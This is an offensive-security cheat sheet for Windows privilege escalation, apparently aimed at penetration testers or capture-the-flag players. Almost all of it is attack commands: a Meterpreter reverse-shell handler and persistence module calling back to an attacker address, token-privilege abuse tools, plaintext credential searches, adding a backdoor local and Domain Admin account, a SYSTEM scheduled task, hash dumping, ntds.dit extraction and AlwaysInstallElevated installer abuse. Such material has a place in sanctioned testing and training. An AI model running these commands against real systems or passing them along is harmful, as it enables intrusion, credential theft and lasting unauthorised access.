🚨S1REN's windows privesc

Initial Enumeration

• Domain Enum (if joined)
  • BloodHound / SharpHound
• Whoami
  • whoami
  • echo %username%
• Privileges
  • whoami /priv
• System Info
  • systeminfo
  • wmic os get Caption,CSDVersion,OSArchitecture,Version
• Services
  • wmic service get name,startname
  • net start
• Admin Check
  • net localgroup administrators
  • net user
• Network
  • netstat -anoy
  • route print
  • arp -A
  • ipconfig /all
• Users
  • net users
  • net user
  • net localgroup
• Firewall
  • netsh advfirewall firewall show rule name=all
• Scheduled Tasks
  • schtasks /query /fo LIST /v > schtasks.txt
• Installation Rights
  • reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
  • reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Windows Priv Esc: GitHub Exploits

• SeDebugPrivilege → GitHub PoC
• SeImpersonatePrivilege → PrintSpoofer
• SeAssignPrimaryToken → HackTricks
• SeTcbPrivilege → token-priv
• SeCreateTokenPrivilege → token-priv
• SeLoadDriverPrivilege → SeLoadDriverPrivilege
• SeTakeOwnershipPrivilege → token-priv
• SeRestorePrivilege → SeRestoreAbuse
• SeBackupPrivilege → SeBackupPrivilege
• SeIncreaseQuotaPrivilege → HackTricks
• SeSystemEnvironment → HackTricks
• SeMachineAccount → HackTricks
• SeTrustedCredManAccess → MS Docs
• SeRelabelPrivilege → RelabelAbuse
• SeManageVolumePrivilege → SeManageVolumeExploit
• SeCreateGlobalPrivilege → HackTricks
• Notes
  • PrintSpoofer is gold for SeImpersonatePrivilege.
  • SeManageVolume has practical field PoCs.

Maintaining Access

• Meterpreter Reverse Shell Setup
  • msfconsole
  • use exploit/multi/handler
  • set PAYLOAD windows/meterpreter/reverse_tcp
  • set LHOST <attacker_ip>
  • set LPORT <port>
  • exploit
• Persistence
  • meterpreter > run persistence -U -i 5 -p 443 -r <LHOST>
• Port Forwarding
  • meterpreter > portfwd add -l 3306 -p 3306 -r <target_ip>
• System Migration
  • meterpreter > run post/windows/manage/migrate
  • meterpreter > migrate <PID>
• Execute Payloads
  • powershell.exe "C:\Tools\privesc.ps1"

Privilege Escalation Checklist

• Unquoted Service Paths
  • wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /v "C:\Windows" | findstr /v '"'
• Weak Service Permissions
  • accesschk.exe -uwcqv <service>
  • sc qc <service>
  • icacls "C:\Path\To\Service.exe"
• File Transfer Options
  • certutil.exe, powershell (IEX), SMB, FTP, TFTP, VBScript
• Clear Text Credentials
  • findstr /si password *.txt *.xml *.ini
  • dir /s *pass* == *cred* == *.config*
• Weak File Permissions
  • accesschk.exe -uwqs Users c:\*.* -accepteula
  • accesschk.exe -uwqs "Authenticated Users" c:\*.* -accepteula
• New Admin User
  • net user siren P@ssw0rd! /add
  • net localgroup administrators siren /add
  • net group "Domain Admins" siren /add /domain

Scheduled Task Abuse

• Enumeration
  • schtasks /query /fo LIST /v > tasks.txt
• Create System Task
  • schtasks /create /ru SYSTEM /sc MINUTE /mo 5 /tn RUNME /tr "C:\Tools\sirenMaint.exe"
• Run Task
  • schtasks /run /tn "RUNME"

Post Exploit Enumeration

• Network Users
  • net user
  • net user <target>
  • net localgroup administrators
• NT Authority Checks
  • whoami
  • accesschk.exe /accepteula MS09-012.exe "whoami"
• Hash Dump
  • meterpreter > hashdump
• Exfiltrate
  • ntds.dit
  • Use secretsdump.py or disk capture tools
• Installer Abuse
  • AlwaysInstallElevated = 1
  • msiexec /i evil.msi
• Share Enumeration
  • net share
  • net use
  • net use Z: \\TARGET\SHARE /persistent:yes

Toolkit / Resources

• Windows Exploit Suggester
  • GitHub
• Cross Compile Payloads (Linux → Windows)
  • apt-get install mingw-w64
  • x86: i686-w64-mingw32-gcc hello.c -o hello.exe
  • x64: x86_64-w64-mingw32-gcc hello.c -o hello64.exe
• Additional Reading
  • FuzzySecurity
  • HackTricks Windows Local Privilege Escalation